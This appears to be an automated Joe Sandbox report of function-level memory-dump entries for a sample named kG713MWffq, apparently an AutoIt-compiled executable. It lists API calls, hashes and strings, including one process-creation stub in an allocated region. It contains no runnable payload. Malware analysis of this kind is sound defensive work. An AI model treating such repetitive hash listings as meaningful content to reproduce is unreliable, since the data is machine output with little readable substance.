                                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: Error:
                                                                                        • API String ID: 4104443479-232661952
                                                                                        • Opcode ID: 05a8bb3239cd95c3ebc78f8148cc2b90f6a11ce9cadf0c832a59df9964cf9f18
                                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                        • Opcode Fuzzy Hash: 05a8bb3239cd95c3ebc78f8148cc2b90f6a11ce9cadf0c832a59df9964cf9f18
                                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                        APIs
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                        • String ID: X$pWH
                                                                                        • API String ID: 85490731-941433119
                                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03DBBA7D
                                                                                        • ExitProcess.KERNEL32(00000000), ref: 03DBBA9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CreateExit
                                                                                        • String ID: D
                                                                                        • API String ID: 126409537-2746444292
                                                                                        • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                                        • Instruction ID: cec5354c8d716c9d86311983e8970fcffb1b46508798f2c6bc8a963504cdc064
                                                                                        • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                                        • Instruction Fuzzy Hash: F7F0FF7594424CEBDB60EFE0CC49FEE777DBF44B01F448909FB4A9A180DA7896088B61
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1794320848-0
                                                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                        APIs
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_
                                                                                        • String ID:
                                                                                        • API String ID: 1144537725-0
                                                                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _malloc$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 680241177-0
                                                                                        • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                        • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                        APIs
                                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 4217535847-0
                                                                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0043210A
                                                                                          • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                          • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                        • _free.LIBCMT ref: 0043211D
                                                                                        • _free.LIBCMT ref: 00432130
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                        • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                                        • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                        • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                        • _free.LIBCMT ref: 004295A0
                                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 3938964917-2806939583
                                                                                        • Opcode ID: 0a0d615a997210ee2bb358d7443dd458a2c9028e559136412fb3eee5400eb1f1
                                                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                        • Opcode Fuzzy Hash: 0a0d615a997210ee2bb358d7443dd458a2c9028e559136412fb3eee5400eb1f1
                                                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                        Strings
                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcat
                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                        • API String ID: 1765576173-2684727018
                                                                                        • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                        • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: fec6c4bcd8e4398365b3bb9f8c862bd53424f51362970eee187c320733aade43
                                                                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                        • Opcode Fuzzy Hash: fec6c4bcd8e4398365b3bb9f8c862bd53424f51362970eee187c320733aade43
                                                                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: c7123187e227ccadb514fc9e2d95ad1b162051813cad40a6001a12c54a489a4c
                                                                                        • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                                        • Opcode Fuzzy Hash: c7123187e227ccadb514fc9e2d95ad1b162051813cad40a6001a12c54a489a4c
                                                                                        • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                                        APIs
                                                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                        • _strcat.LIBCMT ref: 0040F786
                                                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 3199840319-0
                                                                                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                        APIs
                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                        • __lock_file.LIBCMT ref: 00414A8D
